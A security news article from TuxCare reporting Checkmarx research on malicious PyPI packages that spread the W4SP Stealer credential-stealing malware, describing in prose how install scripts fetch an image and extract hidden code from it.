ClickCease Attackers use malicious python packages to spread W4SP Stealer

Join Our Popular Newsletter

Join 4,500+ Linux & Open Source Professionals!

2x a month. No spam.

Attackers leverage malicious python packages to spread W4SP Stealer

Obanla Opeyemi

November 29, 2022 - TuxCare expert team

Security researchers from Checkmarx have uncovered an ongoing supply chain attack that involves spreading the malware identified as W4SP Stealer.

W4SP Stealer is a discord malware that grabs all the Discord accounts, passwords, crypto wallets, credit cards and other data on a victim’s PC and then sends them back to the attacker.

W4SP Stealer is currently sold for $20 and interested buyers can pay with crypto or gift cards. The maker of WASP claims it is entirely undetectable and is “protected by some awesome obfuscation.”

The attackers leverage malicious Python packages to distribute the malware. Checkmarx claimed hundreds of users are already victims of the malware. Checkmarx’s report therefore buttress findings from Phylum and Check Point which saw them flag 30 different modules published on the Python Package Index (PyPI). These modules were specifically designed to propagate malicious code under the guise of benign-looking packages.

According to researchers at Checkmarx, the threat actor behind the attacks is “WASP.” The attacker use polymorphic malware, reboot persistent and stenography to hide code inside packages, building a fake GitHub reputation in the process.

Polymorphic code uses a polymorphic engine to mutate while keeping the original algorithm intact. This means that the code changes itself every time it runs although the function of the code remains the same. The technique is used by computer viruses, shellcodes and computer worms to hide their presence.

After installing the malicious package, the setup.py script is executed, and additional Python packages are installed. The setup.pyscript downloads a .PNG image and saves it in the operating system’s temp directory. The setup.py script then uses the “Isb.reveal” function located in the malicious “judyb” package to extract a hidden code from the image downloaded.

The sources for this piece include an article in TheHackerNews.

Summary
Attackers use malicious python packages to spread W4SP Stealer
Article Name
Attackers use malicious python packages to spread W4SP Stealer
Description
Checkmarx researchers have uncovered an ongoing supply chain attack that involves spreading the malware identified as W4SP Stealer.
Author
Publisher Name
TuxCare
Publisher Logo

Looking to automate vulnerability patching without kernel reboots, system downtime, or scheduled maintenance windows?

Learn About Live Patching with TuxCare

Related Articles

How GPT models can be...

According to CyberArk researchers, GPT-based models like ChatGPT can be...

January 30, 2023

Attackers actively exploit Unpatched Control...

Malicious hackers have started exploiting a critical vulnerability CVE-2022-44877 in...

January 27, 2023

Attackers distribute malware via malicious...

Deep Instinct researchers reported that RATs like StrRAT and Ratty...

January 26, 2023

CircleCI partners AWS to identify...

According to CircleCI’s CTO, Rob Zuber, CircleCI is working with...

January 25, 2023

Cisco warns of authentication bypass...

A remote attacker could exploit multiple vulnerabilities in four Cisco...

January 24, 2023

IceID malware infiltrates Active Directory...

In a notable IcedID malware attack, the assailant impacted the...

January 23, 2023